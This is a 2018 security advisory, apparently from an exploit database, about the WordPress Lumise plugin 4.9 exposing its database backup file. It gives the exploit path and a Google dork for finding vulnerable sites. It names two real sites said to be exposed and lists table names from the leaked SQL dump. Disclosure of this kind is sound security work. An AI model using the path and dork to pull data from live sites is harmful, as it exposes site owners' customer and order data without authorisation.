WordPress Lumise 4.9 Database Disclosure

2018.12.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : WordPress Lumise Plugins 4.9 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 17/12/2018 # Vendor Homepage : wordpress.org ~ sequelpro.com ~ lumise.com + codecanyon.net/category/wordpress?tags=lumise # Software Download Link : codecanyon.net/item/lumise-product-designer-woocommerce-wordpress/21222684 # Tested On : Windows and Linux # Category : WebApps # Version Information : WordPress 4.7.x - 4.9.x + Compatible With : WooCommerce 3.0.x - 3.2.x # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/lumise/woo/'' + intext:''Projetado por "AgAancia dPublicidade"'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/lumise/woo/sample/database.txt ################################################################################################# # Example SQL Dump Some Informations and SQL Tables Dumps => # ************************************************************ # Sequel Pro SQL dump # Version 4541 # # sequelpro.com/ # github.com/sequelpro/sequelpro # # Host: 127.0.0.1 (MySQL 5.7.18) # Database: lumise ************************************************************ # Dump of table lumise_bugs # Dump of table lumise_categories # Dump of table lumise_categories_reference # Dump of table lumise_cliparts # Dump of table lumise_designs # Dump of table lumise_fonts # Dump of table lumise_guests # Dump of table lumise_languages # Dump of table lumise_order_products # Dump of table lumise_orders # Dump of table lumise_printings # Dump of table lumise_products # Dump of table lumise_settings # Dump of table lumise_shapes # Dump of table lumise_shares # Dump of table lumise_tags # Dump of table lumise_tags_reference # Dump of table lumise_templates # Dumping data for table `lumise_products` # Dumping data for table `lumise_shapes` # Dumping data for table `lumise_settings` INSERT INTO `lumise_products` (`id`, `name`, `price`, `product`, `thumbnail`, `thumbnail_url`, `template`, `description`, `stages`, `color`, `change_color`, `attributes`, `printings`, `active`, `created`, `updated`, `order`, `size`, `orientation`) VALUES INSERT INTO `lumise_settings` (`id`, `key`, `value`, `created`, `updated`) VALUES ################################################################################################# # Example Vulnerable Sites => [+] mvmprint.bg/wp-content/plugins/lumise/woo/sample/database.txt [+] criefacil.com/wp-content/plugins/lumise/woo/sample/database.txt ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top